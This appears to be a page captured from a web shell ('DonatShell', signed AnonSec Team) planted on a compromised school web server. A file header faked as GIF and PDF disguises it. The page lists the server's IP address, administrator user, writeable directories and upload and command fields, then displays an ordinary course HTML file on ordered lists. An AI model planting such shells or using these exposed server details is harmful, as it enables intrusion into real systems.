GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST1021/Resources/Week/13/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST1021/Resources/Week/13/ordered_lists.html
<!DOCTYPE html>
<html lang="en">

<head>
    <title>Ordered Lists</title>
    <meta charset="utf-8">
    <link href="lists.css" rel="stylesheet">
</head>

<body>

    <h1>Ordered Lists</h1>

    <h2>Ordered List (unstyled)</h2>
    <ol>
        <li>Coffee</li>
        <li>Tea</li>
        <li>Milk</li>
        <li>
            <b>Second list</b>
            <ol>
                <li>Line 1</li>
                <li>Line 2</li>
                <li>
                    <b>Third list</b>
                    <ol>
                        <li>Line 1</li>
                        <li>Line 2</li>
                    </ol>
                </li>
            </ol>
        </li>
    </ol>

    <h2>Ordered List with lower-roman Bullets</h2>
    <ol style="list-style-type:lower-roman;">
        <li>Coffee</li>
        <li>Tea</li>
        <li>Milk</li>
    </ol>

    <h2>Ordered List with upper-roman Bullets</h2>
    <ol style="list-style-type:upper-roman;">
        <li>Coffee</li>
        <li>Tea</li>
        <li>Milk</li>
    </ol>

    <h2>Ordered List with upper-alpha Bullets</h2>
    <ol style="list-style-type:upper-alpha;">
        <li>Coffee</li>
        <li>Tea</li>
        <li>Milk</li>
    </ol>

</body>

</html>

Anon7 - 2022
AnonSec Team